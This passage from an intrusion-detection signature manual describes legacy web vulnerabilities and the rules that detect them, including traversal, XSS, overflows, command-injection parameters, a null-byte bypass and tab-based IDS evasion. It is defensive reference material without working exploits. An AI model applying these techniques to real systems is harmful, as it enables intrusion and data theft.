i386,3.0 SP4 alpha,3.0 SP3 i386,3.0 SP3 alpha,3.0 SP2 i386,3.0 SP2 alpha,3.0 SP1 i386,3.0 SP1 alpha,3.0 SP1
alpha,3.0 alpha have this vulnerability. A valid NT user accounts may use the module cphost.dll to upload content for
Site Server 3.0. During this process, temporary files are created in the location C:\Temp, which is not configurable. If a
malicious party uploads content with a Target URL parameter of more than approximately 250 characters, the upload
process will fail, and the temporary file will not be deleted. An authenticated attacker may exploit this to exhaust all
drive space on C drive.
Signature ID: 1321
PHPBB2 Image Tag HTML Injection Vulnerability
Signature Description: PhpBB (short of php Bulletin Board) is one of the most powerful and commonly used forum
systems nowadays. It is suitable for newbies as well as more technically oriented users. phpBB is an open source
project and can be used for FREE. phpBB, phpBB 2.0 and prior versions are vulnerable to cross-site scripting. A
malicious user(remote attacker) could embedded malicious script(attack script) in a forum message within BBCode
image tags by using a double quotation character (") to escape the image source location and insert arbitrary script. The
script would be executed within a victim's Web browser once the message is viewed. An attacker could use this
vulnerability to steal a user's cookie-based authentication credentials.
Signature ID: 1322
NAI PGP Keyserver WebAdmin Interface Authentication Bypassing Vulnerability
Signature Description: Key server is a computer, typically running special software which provides keyss to users or
other programs. The users or programs can be working in that or another networked computer. KeyServer is the most
widely used network-independent software license manager for Macintosh and Windows-based computers. PGP,
Keyserver 7.0 and PGP, Keyserver 7.0.1 versions are vulnerable, these versions are vulnerable to a denial of service
attack, caused by a vulnerability in the default permissions of the Web interface. That allows a malicious user(remote
attacker) to access administrative features without authentication. The flaw is due to the server not validating input to
the "action" variable in the "cs.exe" script. This may allow an attacker to manipulate administrative features and
configuration options.
Signature ID: 1323
Cybercop scanner network vulnerability
Signature Description: CyberCorp Scanner is a commercial network security assessment component that can scan
devices on the network for vulnerabilities. The results of a scan could provide the information about the weaknesses of
network and systems. This information could be useful to an attacker for performing an attack.
Signature ID: 1324
Mobius DocumentDirect for the Internet 1.2 Buffer Overflow vulnerability
Signature Description: Mobius Management Systems, DocumentDirect for the Internet 1.2 is vulnerable to stack-based
buffer overflow, a number of unchecked static buffers exist in this version. By sending a GET request to ddicgi.exe
containing a string of 1553 characters or more, a remote attacker can overflow a buffer in ddicigi.exe to execute
arbitrary code or crash the system.
183
Signature ID: 1325
EditTag edittag.pl File Disclosure Vulnerability
Bugtraq: 6675
Signature Description: EditTag is a script which facilitates website content management. EditTag allows users to edit
pages using a web interface, but restricts editing to specific tagged areas of the document. This feature enables website
managers to create a way for content authors who may not know HTML to update a web page in real time without
having to worry about adversely affecting the underlying HTML code. Greg Billock EditTag 1.1 is vulnerable version,
a malicious user(remote attacker) could send a request, that contains encoded directory traversal sequences after
received this type of requests EditTag 'edittag.pl'perl script does not validate properly the CGI parameters result in the
disclosure of arbitrary web server readable files.
Signature ID: 1326
CGI Perl mail programs allow execution of arbitrary commands vulnerability
Signature Description: Many of these Perl-based programs accept metacharacters in the recipient's email address field.
A malicious user(remote attacker) can insert specially-crafted metacharacters into this field to execute arbitrary
commands on the system running the script.
Signature ID: 1327
Virtual Visions FTP Browser directory traversal vulnerability
Signature Description: The Virtual Visions FTP Browser is a CGI script that provides an HTML interface to files that
available to download. FTP Browser allows user to display a html enhanced directory listing, which is great for
managing user ftp files. Virtual Vision FTP Browser 1.0 is version vulnerable to directory traversal. A malicious
user(remote attacker) could send a URL request containing "dot dot" sequences (/../) to the server as "dir" parameter
value, after received this type of requests it is not validating properly the user supplied data, then there is chance to
traverse directories and retrieve arbitrary files from the Web server. This signature detects whenevr tha user try to
access ftp.pl.
Signature ID: 1328
Virtual Visions FTP Browser directory traversal vulnerability
Signature Description: The Virtual Visions FTP Browser is a CGI script that provides an HTML interface to files that
available to download. FTP Browser allows user to display a html enhanced directory listing, which is great for
managing user ftp files. Virtual Vision FTP Browser 1.0 is version vulnerable to directory traversal. A malicious
user(remote attacker) could send a URL request containing "dot dot" sequences (/../) to the server as "dir" parameter
value, after received this type of requests it is not validating properly the user supplied data, then there is chance to
traverse directories and retrieve arbitrary files from the Web server.
Signature ID: 1329
PHP-Survey Global.INC Information Disclosure Vulnerability
Industry ID: CVE-2002-0614 Bugtraq: 4612 ,4612
Signature Description: PHP-Survey is an online survey creation and management system written in PHP. It uses a
184
MySQL database on backend for all data handling. PHP-Survey, 20000615 and prior, could allow a remote attacker to
gain sensitive information. This issue is triggered when an attacker submits an HTTP request for the global.inc
file(Global.inc holds the database information, and it contains user names, passwords). This successful exploitation can
allow an attacker to gain sensitive information such as user names, passwords, and the localhost. No remedy available
as of September, 2008.
Signature ID: 1330
Oracle 9IAS OracleJSP Information Disclosure vulnerability
and JSP. A file called ‘globals.jsa’ is available on the server without user restrictions if the default
settings are used. Sensitive information including user names and passwords are stored in this file. Information
obtained by attacker can then be used in further attacks.
Signature ID: 1332
IRIX cgi-bin handler access vulnerability
IRIX operating system to connect technical and creative professionals to a world of innovation and discovery. SGI
IRIX 6.4, SGI IRIX 6.3, SGI IRIX 6.2 and SGI IRIX 5.3 are vulnerable versions to execute arbitrary code. A
vulnerability exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. So
these vulnerable versions will allow a remote attacker to execute arbitrary commands on the vulnerable host as the user
the web server is running as. This can easily result in a user being able to access the system. This signature generate log
"/cgi-bin/handler/" accessing.
Signature ID: 1333
IRIX cgi-bin handler execute arbitrary commands vulnerability
IRIX operating system to connect technical and creative professionals to a world of innovation and discovery. SGI
IRIX 6.4, SGI IRIX 6.3, SGI IRIX 6.2 and SGI IRIX 5.3 are vulnerable versions to execute arbitrary code. A
vulnerability exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. So
these vulnerable versions will allow a remote attacker to execute arbitrary commands on the vulnerable host as the user
the web server is running as. This can easily result in a user being able to access the system.
Signature ID: 1334
Htgrep access attempt vulnerability
Signature Description: Htgrep is a cgi-bin script written in perl, and can be used with any http server that supports cgibin scripts. Linux, Kernel and Microsoft, Windows NT 4.0 and Various vendors, Unix are vulnerable to obtain
sensitive information, the vulnerability existed in Htgrep CGI. An attacker can send a request by adding a header and
footer file to the search input to view arbitrary files in the Web server's directory with the privileges of the Web user.
185
Signature ID: 1335
Htgrep access attempt vulnerability
Signature Description: Htgrep is a cgi-bin script written in perl, and can be used with any http server that supports cgibin scripts. Linux, Kernel and Microsoft, Windows NT 4.0 and Various vendors, Unix are vulnerable to obtain
sensitive information, the vulnerability existed in Htgrep CGI. An attacker can send a request by adding a header and
footer file to the search input to view arbitrary files in the Web server's directory with the privileges of the Web user.
This script allows remote attackers to read arbitrary files by specifying the full path name in the hdr parameter.
Signature ID: 1336
IChat directory traversal attempt
Signature Description: IChat is also a versatile instant text messaging application. iChat 3.0 web server is vulnerable to
a read arbitrary files via a .. (dot dot). This issue is fixed in latest version. Users are advised to update the latest version
to resolve this issue.
Signature ID: 1337
IPlanet Web Publisher Remote Buffer Overflow Vulnerability
Signature Description: Web Publisher is an automated FTP client that allows to upload and then update user web site
easily. Web Publisher can automatically find and upload new and modified files. Netscape Enterprise Server 4.0nn,
Enterprise Server 4.1 and Sun, iPlanet Web Server 4.1 SP3 to Sun, iPlanet Web Server 4.1 SP7 are vulnerable versions,
the Web Publisher feature not validating properly the Uniform Resource Identifier (URI). By sending an HTTP request
containing 2000 characters or more and specifying one of the Web Publisher specific methods, an attacker can
overflow a buffer to gain shell access to the server or possibly cause a denial of service against the affected server or
possibly execute arbitrary code via this type of long URI request.
Signature ID: 1338
IPlanet Web Server Search Component File Disclosure Vulnerability
Signature Description: Web server is a computer with a boot device or other disk containing a web site. HP-UX 11 and
IBM, AIX 4.3.3 and AIX 5.1 versions, Microsoft, Windows 2003 Server and RedHat, Linux 6.2 and Linux 7.1
versions, Sun, iPlanet Web Server 4.1 and iPlanet Web Server 6.0 versions, Sun - Solaris 2.6 and Solaris 7.0 and
Solaris 8 and Solaris 9 are vulnerable. A malicious user(remote attacker) could send a URL request containing "dot
dot" sequences (/../) to the server as "NS-query-pat" parameter values, which would cause the search engine to return
the contents of the requested file, after received this type of requests it is not validating properly the user supplied data,
then there is chance to traverse directories and retrieve arbitrary files from the Web server.
Signature ID: 1339
Owl Intranet Engine Login Mechanism vulnerability
Nessus: 11626
Signature Description: Owl is a multi user document repository (knowledge base) system written in PHP4 for
publishing files/documents onto the web for small to medium business level groups. This rule triggers when an attempt
186
is made to login to see the files and folders in the repository. Owl Intranet Engine version 0.71 is vulnerable to Login
bypass due to an error in the validation of user credentials supplied to the PHP script 'browse.php'. This can be
exploited by a malicious person to bypass user authentication by requesting the affected PHP script and supply an
invalid username.
Signature ID: 1340
Allaire JRun Web Root Directory Disclosure Vulnerability
Signature Description: Allaire JRun is a web application development suite with JSP and Java Servlets. Macromedia
JRun 3.0 and Macromedia JRun 3.1 are vulnerable versions, a remote attacker could send a malformed URL for server
jsp page, after received this due to the improper handling this malformed URLs, a vulnerability exists in Allaire JRun
which could disclose the contents under the web server root directory. It is also possible to view the contents of any sub
directories along with ACL protected resources. This vulnerability could also be used to disclose the source of known
files residing on the host, including the source of ASP files.
Signature ID: 1341
Diva LAN ISDN Modem Denial of Service vulnerability
Signature Description: Diva LAN ISDN Modem is a powerful networking solution for SOHO and branch office users.
It creates a complete networking, fax, phone and data communications system in one box. Eicon Networks DIVA T/A
ISDN Modem 2.0, Eicon Networks DIVA T/A ISDN Modem 1.0 and Eicon Networks DIVA LAN ISDN Modem 1.0
Release 2.5 are vulnerable versions to denial of service. A remote attacker can connect to the Diva HTTP port and send
a Get request (using the syntax 'login.html?password=<very long string>') to cause the system to lock down, here
attacker is sending connection request to login.gtml page with very long values to 'password' parameter, after received
this it can not give any response, now the system under DoS.
Signature ID: 1342
WEB ls%20-l
Signature Description: The ls command lists all of the files and subdirectories in a given directory. To look at details
about these files and directories, we can use ls -l which shows a long listing. This rule will triggers when an attacker to
send a 'ls -l' to http web server.
Signature ID: 1343
Mailman cross site scripting vulnerability
Signature Description: Mailman is the GNU mailing list manager. It provides standard list management features,
integrated with a web interface. All versions from GNU Mailman 2.0 to GNU Mailman 2.0.11 are vulnerable,
GNU Mailman is prone to a cross-site scripting vulnerability. A remote attacker could send a specially-crafted script
code, after received this request it is not sanitized from the URI parameters of mailing list subscribe scripts. An attacker
may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the
link.
187
Signature ID: 1344
EZMall2000 Credit Card Exposure Vulneribility
Signature Description: EZMall 2000 is an e-commerce application designed to handle the online purchases of products
by customers. However,when the package is improperly configured, search engines may index the data of customers,
including sensitive information such as credit card numbers. Seaside Enterprises EZMall 2000.0 is vulnerable version.
This makes it possible for a user with malicious motives to use search engines as a means of finding vulnerable sites,
and then visiting the sites to gain sensitive information such as credit card numbers, addresses, and other personal
information.
Signature ID: 1345
Mkplog.exe access
Signature Description: This event is generated when an attempt is made to exploit a known vulnerability on a web
server or a web application resident on a web server
Signature ID: 1346
Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
Signature Description: Oracle 9i Application Server comes with an Apache-based web server and support for
environments such as SOAP, PL/SQL, XSQL and JSP.The PL/SQL Apache module for Oracle 9iAS provides
functionality for remote administration of the Database Access Descriptors and access to help pages. Oracle,
Application Server 9i is vulnerable to directory traversal. A remote attacker can send a specially-crafted web request
contained double encoded variations of dot-dot-slash (../) sequences to effectively break out of the 'admin' directory. If
the attacker can browse the file system of the host, they can display the contents of arbitrary web-readable files. This is
only an issue on Microsoft Windows NT/2000 operating systems.
Signature ID: 1347
Brightstation Muscat Root Path Disclosure Vulnerability
Signature Description: Brightstation Muscat is a search engine application. It is possible to get the physical location of
a virtual web directory of a host in Brightstation. Brightstation Muscat 1.0 is vulnerable to gain access to the database
directory path. A remote attacker can send a specially-crafted URL with an invalid database path request to the
Empower CGI script to cause the script to return an error message that reveals the actual database path. This
information could be useful in future attacks. Successful exploitation of this vulnerability could enable a remote user to
gain access to confidential information, which may assist in further attacks against the host.
Signature ID: 1348
Nessus 1.X 404 probe Vulnerability
Signature Description: Nessus is a great tool designed to automate the testing and discovery of known security
problems. The remote web server is configured in that it does not return '404 Not Found' error codes when a nonexistent file is requested, perhaps returning a site map, search page or authentication page instead.
188
Signature ID: 1349
Nessus 2.x 404 probe Vulnerability
Nessus: 10386
privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between
the victim server and other hosts can be exploited by the attacker. This log is generated when an attempt is made to
ascertain weather or not a Web server or an application running on a web server is subject to a possible vulnerability
using the tool Nessus.
Signature ID: 1350
Net attempt Vulnerability
Signature Description: Net.exe is a command line program that ships with Windows that lets control services at a
command prompt. It is used to modify user accounts. This rule triggered when an attacker access to the net.exe. This
successful exploitation can allow an attacker to gain sensitive information and modify user accounts such as user name,
password.
Signature ID: 1351
Nstelemetry.adp access
Signature Description: AOLserver has a built-in statistics-gathering system that collects data on the caches, tcl interps,
threads, and other interesting data. The file "nstelemetry.adp" can be dropped into any running server to get a snapshot
of how it's doing. The "nstelemetry.adp" file can be found in the tests/ directory of the AOLserver Source Distribution.
This rule generates an event when an attacker send "nstelemetry.adp" pattern.
Signature ID: 1353
Oracle Web Listener Batch File Vulnerability
Signature Description: Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in
the /ows-bin/ directory by default. Oracle Web Listener 4.0 .x for NT version is vulnerable. A remote attacker could
send a specially-crafted URL that contains '?&', and command to the file name, any of these batch files can be used to
run arbitrary commands on the server, simply by appending '?&' and a command to the file name. The command will
be run at the SYSTEM level. The name of a batch file is not even necessary, as it will translate the '*' character and
apply the appended string to every batch file in the directory. Moreover, UNC paths can be used to cause the server to
download and execute remote code.
Signature ID: 1354
HTTP Post Arbitrary Perl Code Execution vulnerability
Signature Description: NetWare is a network operating system developed by Novell, Inc. It initially used cooperative
multitasking to run various services on a PC, and the network protocols were based on the archetypal XNS stack.
Novell Netware 6.0 SP1, Novell Netware 6.0, Novell Netware 5.1 SP4,Novell Netware 5.1 are vulnerable versions are
allowing remote attackers to execute arbitrary arbitrary code via requests. These versions are not validating properly
189
the user inputs through the uri, so a malicious user(remote attacker) could exploit this vulnerability by sending arbitrary
Perl code to the Web server using an HTTP POST request. Patches are available at novell website.
Signature ID: 1355
PowerScripts PlusMail WebConsole Poor Authentication vulnerability
Signature Description: PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining
mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative user name and password
without knowing the current one, by passing the proper arguments to the plusmail script. This can be accomplished by
submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgibin/plusmail). Other arguments the script expects are "user name", "password" and "password1", where user name
equals the new log in name, password and password1 contain matching passwords to set the new password to.
PowerScripts PlusMail WebConsole 1.0 is prone to this vulnerability.
Signature ID: 1356
Queryhit.htm access Vulnerability
Nessus: 10370
Signature Description: Queryhit.htm file is a sample search page. It is used to find password(.pwd) files on the system.
This rule triggered when an attacker access the queryhit.htm file, an attacker can use this vulnerability to execute
arbitrary commands on the system and read arbitrary files or gain sensitive information.
Signature ID: 1357
Remote Command Service attempt Vulnerability
Signature Description: The Remote Command Service consists of client and server components. The client component
is a command-line program, Rcmd.exe. It provides a secure, stable way to remotely administer and run command-line
programs. The server component, Rcmdsvc.exe, is installed and run as a service. This rule will trigger when an attacker
access to the 'rcmd.exe', an attacker can use this vulnerability to execute arbitrary commands on the system.
Signature ID: 1358
Robots.txt file access vulnerability
Nessus: 10302
Signature Description: The robots.txt file exists on the webserver to provide instructions to automated crawling engines
(such as Yahoo! or Google) to NOT index specified areas of the application. Robots.txt is a regular text file that
through its name, has special meaning to the majority of "honorable" robots on the web. By defining a few rules in this
robots.ext file, we can instruct robots to not crawl and index certain files, directories within site, or at all.
Signature ID: 1359
Caldera OpenLinux 2.3 rpm_query CGI information disclosure Vulnerability
Signature Description: Caldera OpenLinux is a defunct Linux distribution that was created by the former Caldera
Systems corporation. It was the early "business oriented distribution" and foreshadowed the direction of developments
that came to most other distributions and the Linux community generally. Caldera OpenLinux 2.3 is vulnerable version
to gain access, a CGI is installed in /home/httpd/cgi-bin/ path the name is rpm_query. Any user can run this CGI and
190
obtain a listing of the packages, and versions of packages, installed on this system. Remote attackers may use this
information to identify what vulnerable software packages have been installed.
Signature ID: 1360
Solaris sadmind Buffer Overflow Vulnerability
Signature Description: Sadmind is designed to provide remote system administration operations and it is installed by
default. And the service is started automatically. SadMind is a buffer overflow vulnerability. This rule will trigger when
an attacker overwrite the stack pointer within a running sadmind process, an attacker can use this vulnerability to
overflow a buffer and execute arbitrary code with the root privileges.
Signature ID: 1361
Check Point Firewall-1 HTTP Parsing Engine URI Schema Format String Vulnerability
Signature Description: The Checkpoint Firewall-1 NG HTTP Application Intelligence (AI) component is an
application proxy technology designed to prevent potential attacks or detect protocol anomalies targeted at servers
behind the firewall. The AI component contains an HTTP parsing vulnerability that is triggered by sending an invalid
HTTP request through the firewall. When various invalid portions of the request are specified, an error message is
generated in which a user may partially specify the format string to an sprintf() call. This rule checks for exploitation of
this vulnerability in Schema field of an URI. By providing format string specifiers in Schema field, an attacker may
corrupt memory and execute arbitrary code with super-user privileges. Administrators are advised to update the
software.
Signature ID: 1362
SAMBAR Server search.dll directory listing attempt Vulnerability
Signature Description: Sambar server is a multi-threaded, extensible application server with highly rogrammable API.
It has virtual domain support (currently name based) with independent document/CGI directories, log files, and error
templates. Sambar Server 4.4 Beta 3 and Sambar Server 4.3 versions are vulnerable, these versions of this software ship
with a vulnerability in the search.dll. These verion softwares allowing malicious user(remote attacker) to view the
contents of the SAMBAR Server such as mail folders etc by passing paths or invalid values in the 'query' variable.
Attacker will send a specially crafted URI request to search.dll by passing paths or invalid values in the 'query' variable.
Signature ID: 1363
Search.vts access security vulnerability
Bugtraq: 162
Signature Description: Verity's SEARCH'97 Personal for browsers receives four-star rating by PC Computing
Magazine, it is easy setup and fast search capability wins out over AltaVista's Search My Computer Private eXtension.
The SEARCH'97 product suite contains SEARCH'97 Information Server, SEARCH'97 Agent Server, SEARCH'97 CDWeb Publisher, SEARCH'97 Agent Server Toolkit, SEARCH'97 Developer's Kit, SEARCH'97 Personal for Microsoft
Exchange and SEARCH'97 Information Server for Microsoft Exchange. Verity Search97 2.1 is vulnerable to the Verity
search engine. The vulnerability is due to cgi-bin scripts, s97_cgi and s97r_cgi failing to check for the existence of
certain shell meta characters. This version software allows an attacker to access any file on the file system.
191
Signature ID: 1364
HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability
Signature Description: HP Web Jetadmin is a simple, print and imaging peripheral management software tool that
helps optimize device utilization, control color costs, secure devices, and streamline supplies management by enabling
remote configuration, proactive monitoring, security, troubleshooting, and reporting of printing and imaging devices.
HP Web Jetadmin 7.5.2456 version is vulnerable to a remote arbitrary command execution. This issue is due to a
failure of the application to properly validate and sanitize user supplied input. A malicious user(remote attacker)
could send a malicious request to setinfo.hts, after received this is not validating the uesr input to this script. Successful
exploitation of this issue will allow a malicious user to execute arbitrary commands on the affected system.
Signature ID: 1365
Quikstore plain text administrator password access Vulnerability
Signature Description: QuikStore is a commercial store front program providing order management,inventory,and
other e-commerce related functions to web sites.Certain versions of QuikStore stored the administrator name and
password in plain text in this configuration file, named "quikstore.cfg" in these versions. An unsecured default
installation leaves this file world-readable, giving remote intruders access to it through the web server.With access to
this file and the user/password combination contained in it,the intruder has full administrative access to the online
store.Quikstore Quikstore 1.0 is prone to this vulnerability
Signature ID: 1366
3COM OfficeConnect HTTP Port Router Denial of Service Vulnerability
Signature Description: The OfficeConnect ADSL Wireless G Firewall Router is one of the latest all-in-one devices
from 3Com. 3Com OfficeConnect DSL Router 840 1.1.7 and 3Com OfficeConnect DSL Router 812 1.1.7 are
vulnerable versions, these versions are vulnerable to a denial of service attack. A malicious user(remote attacker) can
connect to the HTTP port, it is possible to reboot the router by connecting to the HTTP daemon, and requesting a
malformed URL containing a long character string, The router will power-cycle itself. This problem makes it possible
for a remote user to deny service to legitimate users of networks serviced by the router.
Signature ID: 1367
Netware 6.0 Tomcat source code viewer Vulnerability
Nessus: 12119
operating systems, including UNIX, Linux, and Microsoft Windows (Win32). This event is generated when an attempt
is made to access source.jsp on a Tomcat web server. an attacker can use directory traversal techniques when accessing
source.jsp to view hidden files and directories on the web server with the access privileges of the server.
Signature ID: 1368
Trend Micro InterScan eManager buffer overflow Vulnerability
192
values, after received request with out proper validation cop-ying the given values(overly long values) in to static
buffer at that time that buffer will overflow, then there is a chance to execute arbitrary code within the Local System
context. This signature triggers when an attacker access to the 'spamrule.dll' file.
Signature ID: 1369
Webcam Corp's Webcam Watchdog sresult.exe Cross-Site Scripting vulnerability
Signature Description: Watchdog can record video over a long period of time and monitoring a remote location over
the Internet. Watchdog is usefull to initiate video recording when there's a motion detected. Watchdog can also alert by
emailing the captured image and play the alarm sound. Webcam Corp Webcam Watchdog 4.0.1 version is vulnerable,
this version is affected by a remote cross-site scripting vulnerability in the sresult.exe binary. A malicious user(remote
attacker) can pass malicious HTML code as a value for the affected URI parameter supplied to 'sresult.exe', after
received this software is not validating properly the user supplied inputs, it is possible for a remote attacker to create a
malicious link containing script code that will be executed in the browser of a legitimate user.
Signature ID: 1370
Telnet attempt on HTTP
Signature Description: This event is generated when an attempt is made to access telnet service through Web request.
It is possible to access the telnet service via http request, Attacker's may use this service to enter into the vulnerable
system.
Signature ID: 1371
Tftp attempt on HTTP
Signature Description: This event is generated when an attempt is made to access tftp serivce through Web request.It is
possible to access the tftp service via http request, Attacker's may use this service to download or upload information to
or from the vulnerable system.
Signature ID: 1372
UltraBoard DoS Vulnerability
Signature Description: UltraBoard is a powerful, easy to use and navigate, fully customizable bulletin board system. It
can add interactive message boards to any web site and can increase user interest and use of a web site dramatically.
UltraScripts UltraBoard is an Example of an individual, Web server program. UltraScripts UltraBoard 1.6 and prior
versions also vulnerable to denial of serveice. A malicious user(remote attacker) is able to expend all of the available
resources of the web server by using a specially-devised request to the CGI. This request causes a fork copies of itself,
which will then consume the processor time and memory of the server then the device goto denial of service.
Signature ID: 1373
Unify eWave ServletExec DOS Attack Vulnerability
193
Signature Description: Unify's eWave ServletExec is a JSP and a Java Servlet engine which is to be used as a plug-in
to popular web servers like Apache, IIS, Netscape. By using this possible to send a URL request which causes the
ServletExec servlet engine to terminate abruptly. Unify eWave ServletExec version 3.0c and earlier versions are
vulnerable, these versions are susceptible to a denial of service attack if a URL invoking the ServletExec servlet
preceded by /servlet is requested. The ServletExec engine will attempt to bind a server thread over port 80 and if the
web server is currently running, a java.net. BindException error will give result thus halting all operations on the
ServletExec engine. Restarting the application is required in order to regain normal functionality.
Signature ID: 1374
CalaCode @mail Webmail System Cross-Site Scripting Attempt Vulnerability
Signature Description: CalaCode @Mail is a WebMail Client / Email-server platform that allows users to send and
receive emails via the Web, Wireless Device or Desktop Client. CalaCode @mail Webmail System version 3.64 is
vulnerable version to cross-site scripting. This application does not validate user input values submission to the util.pl
script. So a remote attacker could embed malicious JavaScript in the "Displayed Name" field, which would be executed
in the victim's Web browser within the security context of the hosting site, once the entry is viewed. An attacker could
use this vulnerability to steal the victim's session ID and gain unauthorized access to the victim's email.
Signature ID: 1376
Nombas ScriptEase:Webserver Viewcode Arbitrary File Access Vulnerability
Signature Description: Nombas ScriptEase:Webserver Edition is designed to allow the development of web based
applications in Javascript. It includes the ability to execute Javascript code in response to CGI requests, and support for
developer features such as remote debugging. Nombas ScriptEase: Webserver Edition 4.30d and Nombas ScriptEase:
Webserver Edition 4.30b for all platforms are vulnerable. In these vulnerable versions, default scripts included with
ScriptEase:Webserver Edition allows remote users to disclose arbitrary files residing on a host. A malicious
user(remote attacker) could send a specially crafted URL, it contains dot dot(..) sequence then these is a chance to
directory traversal the attacker can view any file on web server.
Signature ID: 1377
Bradford Barrett Webalizer Cross-Agent Scripting Attack Vulnerability
Signature Description: The Webalizer is a GPL application that generates web pages of analysis, from access and
usage logs, i.e. it is web log analysis software. It is one of the most commonly used web server administration tools. It
produces highly detailed, easily configurable usage reports in HTML format, for viewing with a standard web browser.
Bradford L. Barrett, Webalizer 2.01-06 and prior versions are vulnerable is vulnerable to cross-site scripting. If the
HTTP referrer information is stored in log files analyzed by Webalizer, a malicious user(remote attacker) can inject
malicious HTML tags into a report by sending a "Referer" HTTP header containing HTML metacharacters during
keyword searches to execute scripts and possibly access the compromised HTML reports.
Signature ID: 1378
Webcart access vulnerability
Signature Description: The WebCart shopping cart system is one of the popular e-commerce system on the internet.
Various shopping carts create world readable files in the web server's document tree which have subsequently been
194
indexed by numerous search engines. By default there are some files or directories which are world readable. This
misconfiguration may allow an attacker to gather the credit card numbers of clients.
Signature ID: 1379
Mountain-net WebCart Exposed Orders Vulnerability
'/webcart-lite' file.
Signature ID: 1380
O'Reilly Software WebSite 'webfind.exe' Buffer Overflow Vulnerability
Signature Description: O'Reilly Software WebSite Professional is a web server package distributed by O'Reilly &
Associates. OReilly Software WebSite Professional 2.4.9, OReilly Software WebSite Professional 2.4, OReilly
Software WebSite Professional 2.3.18 versions of this web server containing a remotely exploitable buffer overflow.
The utility in question is a search engine utility titled 'webfind.exe'. This program takes unchecked user input from a
provided search page which can result in a remote user launching arbitrary commands on the server itself. The variable
in question which is overwritten(overly long 'keywords' parameter value) is QUERY_STRING derived from user
'keywords' for their search.
Signature ID: 1381
NT Index Server Directory Traversal Vulnerability
Signature Description: Index Server, Microsoft Index Service allows the contents of files to be indexed to enable freetext searching. What that means to the Intranet Developer is that you can have an Intranet with in excess of 2000
documents and allow users to quickly find those most relevant to them. Microsoft Indexing Services for Windows 2000
and Microsoft Index Server 2.0 version are vulnerable, these verions software allows a remote attacker to access
arbitrary files outside of the web path. A malicious user(remote attacker) could send a URI request specifically
traversal style attacks (../../) supplied via the "CiWebHitsFile" variable. The issue is due to the webhits.dll library not
properly validating the user input. By supplying this type of crafted request to an htw script, it is possible to read
arbitrary files on the system.
Signature ID: 1382
Extropia WebStore Directory Traversal Vulnerability
Signature Description: WebStore is the culmination of eXtropia's experience with online shopping applications. It
merges both the Electronic Outlet HTML and Database versions and adds all new routines for error handling, order
processing, encrypted mailing, frames, Javascript and VBscript and other goodies. Extropia WebStore 1.0 and Extropia
WebStore 2.0 versions are allowing remote attacker to view any file accessible to the web_store.cgi script, The script
does not validate properly the user given inputs to web_store.cgi script. A malicious user(remote attacker) could send a
specially crafted URL request to web_store.cgi script, the attacker can bypass the file extension check by adding a
null character (%00) to the URL, followed by the .html file extension to view non-HTML files. By including "dot dot"
195
(/../) sequences in the URL, a remote attacker can traverse directories on the Web server to view any file that is
accessible to the web_store.cgi script.
Signature ID: 1383
HTTP HEAD Request with Large Message-Body vulnerability
Industry ID: CVE-2008-1854 CVE-2008-1777 CVE-2006-5850 CVE-2003-0409
Signature Description: The HTTP HEAD method is identical to GET except that the server MUST NOT return a
message-body in the response. The meta information contained in the HTTP headers in response to a HEAD request is
identical to the information sent in response to a GET request (RFC 2616). This method can be used for obtaining meta
information about the entity implied by the request without transferring the entity-body itself. This method is often used
for testing hypertext links for validity, accessibility, and recent modification. Normally, the request with HEAD
contains no body and its present in the packet is anomalous. Many tools, like Whisker, use this method to send
anomalous data to server. BRS WebWeaver 1.04, Essentia Web Server 2.15, Novell eDirectory 8.8.2and SmarterMail
5.0.2999 are vulnerable to denial of servivce or stack-based buffer overflow.
Signature ID: 1384
MiniShare HTTP HEAD Request Denial of Service Vulnerability
Signature Description: MiniShare is a free web server software for Microsoft Windows. MiniShare is a quick and easy
way to share files dependless. The files we share are located on our computer and can be accessed by anyone using
their web browser. MiniShare, MiniShare 1.3.2 is vulnerable to denial of service. According to HTTP RFC (2616), any
HTTP request should follow a fixed format i.e. METHOD <space> path(URI) <space> HTTP?1.x. A remote attacker
could send a specially-crafted HTTP HEAD request with less than two new line characters to the MiniShare server,
after received this type of request from any client it is not handle properly, then crash the server. This rule detect one of
such attempts when it sees a request like HEAD/./. Such type of traffic is also sent by tools, like Whisker. The
administrator should check the server's logs for more information.
Signature ID: 1386
HTTP Request with TAB and Splicing
Signature Description: According to HTTP rfc, a HTTP v1.0 request looks like "Method <space> URI <space> HTTP/
Version CRLF CRLF" But many implementation of HTTP accept TAB as delimiter. Thus the following request is also
a valid one:Method <tab> URI <tab> HTTP/ Version CRLF CRLF" If an IDS/IPS does not accept a TAB, it may miss
the pattern, due to wrong parsing. Many IDS evasion tools, like whisker, try to take advantage of this fact and send
malformed URI. This rule hits when system detects a HTTP request with <tab> as separator and URI being spliced in
small chunks.
Signature ID: 1387
WS_FTP Weak Stored Password Encryption Vulnerability
Signature Description: Ipswitch WS_FTP Server is a highly secure, fully featured and easy-to-administer file transfer
server for Microsoft Windows systems. It is used by administrators globally to support millions of end users and enable
the transfer of billions of files. Users can connect to host, list folders and files, and (depending on permissions)
download and upload data. Administrators can control access to data and files with granular permissions by folder,
user, and group. Administrators can also create multiple hosts that function as completely distinct sites. Ipswitch
WS_FTP Pro 6.0, Ipswitch WS_FTP LE 5.0, Ipswitch WS_FTP LE 4.5 are vulnerable versions. WS_FTP, both Pro and
196
LE versions, allowing passwords to be saved as part of a saved site configuration. Attacker can access ws_ftp.ini file
from outside the network may cause discloser of sensitive information. The passwords are stored in the .ini files
located in the WS_FTP folder, these passwords are encrypted but the encryption method is weak and can be broken.
Signature ID: 1388
Wsh attempt Vulnerability
Signature Description: WSH(Windows Script Host), an ActiveX scripting host providing an environment for the
execution of scripts using several languages, such as VBScript. This rule triggered when an attacker attempt to run
wsh.exe script on the remote machine, an attacker can use this vulnerability to execute arbitrary code on the system.
Signature ID: 1389
SQL Inject Vulnerability through xp_availablemedia
Signature Description: Windows allows the execution of Windows shell commands through the SQL Server. The
access rights with which these commands will be executed are those of the account with which SQL Server is running,
usually Local System. This event is generated when an attempt to exploit SQL Injection vulnerability on the remote
